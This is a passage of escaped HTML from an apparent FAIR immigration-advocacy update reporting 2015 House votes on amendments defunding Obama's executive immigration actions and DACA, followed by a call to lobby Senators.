The House did so by approving two critical amendments to the Department of Homeland Security (DHS) funding bill and then passing the DHS funding bill in its entirety.<\/p>\n<p>First, the House passed by a vote of\u00a0<a href=\"http:\/\/clerk.house.gov\/evs\/2015\/roll029.xml\" target=\"_blank\">237-190<\/a>\u00a0an\u00a0<a href=\"http:\/\/amendments-rules.house.gov\/amendments\/SEF2291915170535535.pdf\" target=\"_blank\">amendment<\/a>\u00a0authored by Reps. Robert Aderholt (R-AL), Mick Mulvaney (R-SC), and Lou Barletta (R-PA). This amendment prohibits the use of Homeland Security funds or fees to:<\/p>\n<ul>\n<li>Implement President Obama\u2019s November 2014 executive amnesty, known as the\u00a0<a href=\"http:\/\/www.fairus.org\/legislative-updates\/legislative-update-11-24-2014#1\" target=\"_blank\">Johnson Memos<\/a>;<\/li>\n<li>Implement most of the president\u2019s 2011 executive amnesty, known as the<a href=\"http:\/\/www.fairus.org\/morton-memos\" target=\"_blank\">Morton Memos<\/a>;<\/li>\n<li>Provide\u00a0<strong>any Federal benefit<\/strong>\u00a0to any alien pursuant to any of the memos.<\/li>\n<\/ul>\n<p>Then, the House passed\u00a0<a href=\"http:\/\/clerk.house.gov\/evs\/2015\/roll030.xml\" target=\"_blank\">218-209<\/a>\u00a0Rep. Marsha Blackburn\u2019s (R-TN)\u00a0<a href=\"http:\/\/amendments-rules.house.gov\/amendments\/SEF2301915170617617.pdf\" target=\"_blank\">amendment<\/a>that defunds President Obama\u2019s Deferred Action for Childhood Arrivals (DACA) amnesty program.<\/p>\n<p>NOW the battle to defund President Obama\u2019s Executive Amnesty Moves to the Senate!<\/p>\n<p>FAIR is calling on our members, activists, and supporters to take action NOW to ensure the Senate follows suit and defunds President Obama\u2019s executive amnesty. There is no time to waste!!! President Obama is already taking steps to implement his new amnesty programs. The Senate must approve the House-passed bill and send it to the President\u2019s desk. Then, President Obama will have to decide what is more important to him: funding the Department of Homeland Security or protecting illegal aliens.<\/p>\n<p><a href=\"http:\/\/www.opencongress.org\/people\/zipcodelookup\" target=\"_blank\">Call your Members of Congress NOW!<\/a><\/p>\n<p>First, call you Senators and demand they pass the DHS funding bill with the executive amnesty defunding language. Call your Senators now and tell them:<\/p>\n<ul>\n<li>You oppose President Obama\u2019s executive amnesty<\/li>\n<li>You want Congress to stop the President\u2019s abuse of power, now and in the future<\/li>\n<li>You expect Congress to defund the executive amnesty<\/li>\n<li>You demand that Congress act NOW to rein in President Obama\u2019s abuse of power and restore respect for our immigration laws.<\/li>\n<\/ul>\n<p>Then, call your Representatives in the House and thank those who voted for the Aderholt-Mulvaney-Barletta and Blackburn amendments.
